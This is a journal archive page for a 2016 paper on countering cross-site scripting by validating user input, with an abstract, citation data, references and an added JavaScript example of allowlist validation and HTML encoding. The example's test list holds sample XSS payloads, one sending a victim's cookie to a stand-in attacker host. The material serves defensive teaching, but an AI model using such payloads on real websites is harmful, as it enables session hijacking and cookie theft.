Research Article

Presentation of a Pattern to Counteract the Attacks of XSS Malware

by Abbas Ali Najjari, Nasser Modiri
International Journal of Computer Applications
Foundation of Computer Science (FCS), NY, USA
Volume 143 - Number 2
Year of Publication: 2016
Authors: Abbas Ali Najjari, Nasser Modiri
10.5120/ijca2016910014

Abbas Ali Najjari, Nasser Modiri . Presentation of a Pattern to Counteract the Attacks of XSS Malware. International Journal of Computer Applications. 143, 2 ( Jun 2016), 5-11. DOI=10.5120/ijca2016910014

@article{ 10.5120/ijca2016910014,
author = { Abbas Ali Najjari, Nasser Modiri },
title = { Presentation of a Pattern to Counteract the Attacks of XSS Malware },
journal = { International Journal of Computer Applications },
issue_date = { Jun 2016 },
volume = { 143 },
number = { 2 },
month = { Jun },
year = { 2016 },
issn = { 0975-8887 },
pages = { 5-11 },
numpages = {9},
url = { https://ijcaonline.org/archives/volume143/number2/25047-2016910014/ },
doi = { 10.5120/ijca2016910014 },
publisher = {Foundation of Computer Science (FCS), NY, USA},
address = {New York, USA}
}
%0 Journal Article
%A Abbas Ali Najjari
%A Nasser Modiri
%T Presentation of a Pattern to Counteract the Attacks of XSS Malware
%J International Journal of Computer Applications
%@ 0975-8887
%V 143
%N 2
%P 5-11
%D 2016
%I Foundation of Computer Science (FCS), NY, USA
Abstract

Cross-Site Scripting (XSS) is a script-injection attack against web pages and is counted among the most dangerous problems of web applications. Security researchers have investigated many such problems and have found that XSS vulnerabilities exist in many well-known websites. The vulnerability is exploited when an attacker gains control of an authenticated user's web browser and can then steal cookies, deliver malicious software, hijack the session, or redirect the victim. Validation of user input is the first line of defence protecting web applications against this vulnerability, so the main route to improving the security of web applications is improving the quality of that validation. Unfortunately, web application developers often omit user input validation altogether or implement it weakly. This paper attempts to present a pattern for validating user input correctly in web applications, and the obtained results are compared with existing vulnerability-scanning tools.
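As an added example (not code from the paper or its authors), the following Node.js snippet contrasts a rendering that concatenates user input raw into a page with one that applies the pattern the abstract argues for: allowlist validation of each field, followed by output encoding for the HTML context the data lands in. The second step matters because, as the OWASP cheat sheet cited as reference 11 stresses, validation alone cannot make free text safe; it only narrows what reaches the encoder. All function names, the comment-form fields, and the payloads are constructed for this illustration.

```javascript
// Added example (not from Najjari & Modiri's paper): allowlist input
// validation combined with HTML-context output encoding. All function names,
// the comment-form fields and the payloads below are assumptions constructed
// for this illustration.

// Characters with meaning in an HTML text/attribute context, mapped to entities.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;',
  '"': '&quot;', "'": '&#x27;', '/': '&#x2F;',
};

// Output encoding for the HTML element-content context.
function encodeForHtml(value) {
  return String(value).replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Allowlist validation: accept only what the field legitimately needs and
// reject everything else, rather than trying to "clean" bad input.
function validateUsername(input) {
  const s = String(input);
  if (!/^[A-Za-z0-9_]{3,20}$/.test(s)) {
    return { ok: false, reason: 'username must be 3-20 chars of [A-Za-z0-9_]' };
  }
  return { ok: true, value: s };
}

// Free text cannot be restricted to an allowlist of characters, so the
// validation here is structural (length, no control characters); the
// encoding step below is what actually neutralises markup in it.
function validateComment(input) {
  const s = String(input);
  if (s.length === 0 || s.length > 500) {
    return { ok: false, reason: 'comment must be 1-500 chars' };
  }
  if (/[\u0000-\u0008\u000B\u000C\u000E-\u001F\u007F]/.test(s)) {
    return { ok: false, reason: 'comment contains control characters' };
  }
  return { ok: true, value: s };
}

// Vulnerable rendering: user input concatenated raw into the page.
function renderVulnerable(username, comment) {
  return `<div class="comment"><b>${username}</b>: ${comment}</div>`;
}

// Hardened rendering: validate first, then encode for the context the data
// lands in. Validation failures are rejected, not silently repaired.
function renderHardened(username, comment) {
  const u = validateUsername(username);
  if (!u.ok) throw new Error(u.reason);
  const c = validateComment(comment);
  if (!c.ok) throw new Error(c.reason);
  return `<div class="comment"><b>${encodeForHtml(u.value)}</b>: ${encodeForHtml(c.value)}</div>`;
}

// Check used to compare the two renderings: the sorted set of element names
// an HTML parser would see. The template itself contributes only div and b;
// anything else came from user input.
function tagNames(html) {
  const names = new Set();
  for (const m of html.matchAll(/<\/?([A-Za-z][A-Za-z0-9]*)/g)) {
    names.add(m[1].toLowerCase());
  }
  return [...names].sort();
}

// Constructed sample inputs: two classic cookie-stealing payloads and one
// benign comment that merely contains HTML metacharacters.
const PAYLOADS = [
  '<script>location="http://attacker.example/?c="+document.cookie</script>',
  '<img src=x onerror=alert(document.cookie)>',
  'Hello, "world" & <friends>',
];

// Run stand-alone: show which elements each rendering hands to the browser.
for (const p of PAYLOADS) {
  console.log('vulnerable:', tagNames(renderVulnerable('alice', p)));
  console.log('hardened:  ', tagNames(renderHardened('alice', p)));
}
```

Note the division of labour: the username allowlist rejects `<script>` outright, while the free-text comment is accepted and made inert only by `encodeForHtml`. The same data placed in a JavaScript string, a URL, or a CSS value would need a different encoder; the HTML entity table here is correct only for element content and quoted attribute values.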

References
  1. Andrews, A., Offutt, J., Alexander, R. “Testing web applications by modeling with fsms”. Software Syst. Model. 4 (3), 326–345, 2005.
  2. A. Avancini, M. Ceccato (Fondazione Bruno Kessler), “Grammar Based Oracle for Security Testing of Web Applications”, in: 7th International Workshop on Automation of Software Test (AST), pp. 15–21, 2012.
  3. Common Vulnerabilities and Exposures (The Standard for Information Security Vulnerability Names) http://cwe.mitre.org/
  4. D. Balzarotti et al., “Saner: Composing Static and Dynamic Analysis to Validate Sanitization in Web Applications,” Proc. 29th IEEE Symp. Security and Privacy, IEEE CS, pp. 387-401, 2008.
  5. H. Shahriar and M. Zulkernine, “MUTEC: Mutation-Based Testing of Cross Site Scripting,” Proc. 5th Int’l Workshop Software Eng. for Secure Systems (SESS 09), IEEE, pp. 47-53, 2009.
  6. Isatou Hydara, Abu Bakar Md. Sultan, “Current state of research on cross-site scripting (XSS) – A systematic literature review”, Information and Software Technology (Elsevier), Volume 58, February 2015, pp. 170–186.
  7. José Fonseca, Marco Vieira, Henrique Madeira, “Testing and comparing web vulnerability scanning tools for SQL injection and XSS attacks”, in: 13th IEEE International Symposium on Pacific Rim Dependable Computing, pp. 365–372, 2007.
  8. L.K. Shar, H.B.K. Tan, “Predicting common web application vulnerabilities from input validation and sanitization code patterns”, in: Proc. 27th IEEE/ACM Int. Conf. Autom. Softw. Eng. – ASE, p. 310, 2012
  9. M.S. Lam et al., “Securing Web Applications with Static and Dynamic Information Flow Tracking,” Proc. 2008 ACM SIGPLAN Symp. Partial Evaluation and Semantics-Based Program Manipulation (PEPM 08), ACM, pp. 3-12, 2008
  10. N. Li et al., “Perturbation-Based User-Input-Validation Testing of Web Applications,” J. Systems and Software, Nov. 2010, pp. 2263-2274
  11. Open Web Application Security Project, XSS (Cross-Site Scripting) Prevention Cheat Sheet, 2015; https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet.
  12. R.B. Brinhosa, C.M. Westphall, C.B. Westphall, “Proposal and Development of the Web Services Input Validation Model”, in: IEEE Network Operations and Management Symposium (NOMS), pp. 643–646, 2012.
  13. R. Komiya, I. Paik, M. Hisada, “Classification of malicious web code by machine learning”, in: 3rd International Conference on Awareness Science and Technology iCAST, pp. 406–411, 2011.
  14. S. Fogie et al., XSS Attacks: Cross Site Scripting Exploits and Defense, Syngress, 2007.
  15. White Hat Security Website Stats Report 2015, https://info.whitehatsec.com/Website-Stats-Report-2015.html
Index Terms

Computer Science
Information Sciences

Keywords

web vulnerabilities, input validation, XSS, malware